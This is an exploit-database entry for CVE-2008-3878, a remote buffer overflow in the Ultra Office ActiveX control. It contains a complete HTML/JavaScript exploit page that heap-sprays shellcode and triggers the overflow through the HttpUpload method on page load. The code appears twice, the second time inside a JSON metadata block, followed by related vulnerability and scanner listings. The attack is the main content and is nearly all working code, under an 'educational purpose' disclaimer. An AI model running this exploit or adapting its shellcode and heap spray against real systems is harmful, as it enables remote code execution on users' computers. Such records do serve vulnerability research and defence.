Ultra Office ActiveX Control Remote Buffer Overflow Exploit
2008-08-27T00:00:00
ID EDB-ID:6318 Type exploitdb Reporter shinnai Modified 2008-08-27T00:00:00
Description
Ultra Office ActiveX Control Remote Buffer Overflow Exploit. CVE-2008-3878. Remote exploit for windows platform
-----------------------------------------------------------------------------
Ultra Office ActiveX Control Remote Buffer Overflow
url: http://www.ultrashareware.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------
<script language="JavaScript" defer>
var sCode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000");
var sSlide = unescape("%u9090%u9090");
var heapSA = 0x0c0c0c0c;
function tryMe()
{
var buffSize = 20000;
var x = unescape("%0c%0c%0c%0c");
while (x.length<buffSize) x += x;
x = x.substring(0,buffSize);
boom.HttpUpload(x, x, x);
}
function getsSlide(sSlide, sSlideSize)
{
while (sSlide.length*2<sSlideSize)
{
sSlide += sSlide;
}
sSlide = sSlide.substring(0,sSlideSize/2);
return (sSlide);
}
var heapBS = 0x400000;
var sizeHDM = 0x5;
var PLSize = (sCode.length * 2);
var sSlideSize = heapBS - (PLSize + sizeHDM);
var heapBlocks = (heapSA+heapBS)/heapBS;
var memory = new Array();
sSlide = getsSlide(sSlide,sSlideSize);
for (i=0;i<heapBlocks;i++)
{
memory[i] = sSlide + sCode;
}
</script>
<body onload="JavaScript: return tryMe();">
<object id="boom" classid="clsid:00989888-BB72-4E31-A7C6-5F819C24D2F7">
Unable to create object
</object>
# milw0rm.com [2008-08-27]
{"published": "2008-08-27T00:00:00", "id": "EDB-ID:6318", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "history": [], "enchantments": {"vulnersScore": 7.5}, "hash": "fda4c48a3b1cb3a99a9267f04e9df70772515449802c5eb56ac7e07a3f5719b9", "description": "Ultra Office ActiveX Control Remote Buffer Overflow Exploit. CVE-2008-3878. Remote exploit for windows platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/6318/", "lastseen": "2016-02-01T00:37:47", "edition": 1, "title": "Ultra Office ActiveX Control Remote Buffer Overflow Exploit", "osvdbidlist": ["47866"], "modified": "2008-08-27T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": ["CVE-2008-3878"], "sourceHref": "https://www.exploit-db.com/download/6318/", "references": [], "reporter": "shinnai", "sourceData": "-----------------------------------------------------------------------------\n Ultra Office ActiveX Control Remote Buffer Overflow\n url: http://www.ultrashareware.com\n\n Author: shinnai\n mail: shinnai[at]autistici[dot]org\n site: http://www.shinnai.net\n\n This was written for educational purpose. Use it at your own risk.\n Author will be not responsible for any damage.\n\n Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7\n-----------------------------------------------------------------------------\n<script language=\"JavaScript\" defer>\n var sCode = unescape(\"%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800\" +\n \"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A\" +\n \"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350\" +\n \"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40\" +\n \"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000\" +\n \"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040\" +\n \"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD\" +\n \"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40\" +\n \"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18\" +\n \"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0\" +\n \"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B\" +\n \"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24\" +\n \"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9\" +\n \"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C\" +\n \"%u652E%u6578%u9000\");\n var sSlide = unescape(\"%u9090%u9090\");\n var heapSA = 0x0c0c0c0c;\n function tryMe()\n {\n var buffSize = 20000;\n var x = unescape(\"%0c%0c%0c%0c\");\n while (x.length<buffSize) x += x;\n x = x.substring(0,buffSize);\n boom.HttpUpload(x, x, x);\n }\n function getsSlide(sSlide, sSlideSize)\n {\n while (sSlide.length*2<sSlideSize)\n {\n sSlide += sSlide;\n }\n sSlide = sSlide.substring(0,sSlideSize/2);\n return (sSlide);\n }\n var heapBS = 0x400000;\n var sizeHDM = 0x5;\n var PLSize = (sCode.length * 2);\n var sSlideSize = heapBS - (PLSize + sizeHDM);\n var heapBlocks = (heapSA+heapBS)/heapBS;\n var memory = new Array();\n sSlide = getsSlide(sSlide,sSlideSize);\n for (i=0;i<heapBlocks;i++)\n {\n memory[i] = sSlide + sCode;\n }\n </script>\n <body onload=\"JavaScript: return tryMe();\">\n <object id=\"boom\" classid=\"clsid:00989888-BB72-4E31-A7C6-5F819C24D2F7\">\n Unable to create object\n </object>\n\n# milw0rm.com [2008-08-27]\n", "objectVersion": "1.0"}
{"result": {"cve": [{"id": "CVE-2008-3878", "type": "cve", "title": "CVE-2008-3878", "description": "Stack-based buffer overflow in the Ultra.OfficeControl ActiveX control in OfficeCtrl.ocx 2.0.2008.801 in Ultra Shareware Ultra Office Control allows remote attackers to execute arbitrary code via long strUrl, strFile, and strPostData parameters to the HttpUpload method.", "published": "2008-09-02T11:41:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3878", "cvelist": ["CVE-2008-3878"], "lastseen": "2017-09-29T14:26:05"}], "metasploit": [{"id": "MSF:EXPLOIT/WINDOWS/BROWSER/ULTRAOFFICE_HTTPUPLOAD", "type": "metasploit", "title": "Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow", "description": "This module exploits a stack-based buffer overflow in Ultra Shareware's Office Control. When processing the 'HttpUpload' method, the arguments are concatenated together to form a command line to run a bundled version of cURL. If the command fails to run, a stack-based buffer overflow occurs when building the error message. This is due to the use of sprintf() without proper bounds checking. NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload into memory unmodified.", "published": "2010-03-04T06:19:37", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2008-3878"], "lastseen": "2018-03-13T11:14:26"}], "exploitdb": [{"id": "EDB-ID:16513", "type": "exploitdb", "title": "Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow", "description": "Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow. CVE-2008-3878. Remote exploit for windows platform", "published": "2010-09-20T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16513/", "cvelist": ["CVE-2008-3878"], "lastseen": "2016-02-02T00:02:15"}], "openvas": [{"id": "OPENVAS:900208", "type": "openvas", "title": "Ultra Office ActiveX Control Multiple Vulnerabilities", "description": "This host is running Ultra Office Control, which is prone to\n multiple vulnerabilities.", "published": "2008-09-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=900208", "cvelist": ["CVE-2008-3878"], "lastseen": "2017-07-02T21:10:21"}, {"id": "OPENVAS:1361412562310900208", "type": "openvas", "title": "Ultra Office ActiveX Control Multiple Vulnerabilities", "description": "This host is running Ultra Office Control, which is prone to\n multiple vulnerabilities.", "published": "2008-09-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900208", "cvelist": ["CVE-2008-3878"], "lastseen": "2018-04-06T11:16:12"}], "packetstorm": [{"id": "PACKETSTORM:86916", "type": "packetstorm", "title": "Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow", "description": "", "published": "2010-03-05T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/86916/Ultra-Shareware-Office-Control-ActiveX-HttpUpload-Buffer-Overflow.html", "cvelist": ["CVE-2008-3878"], "lastseen": "2016-12-05T22:17:51"}]}}
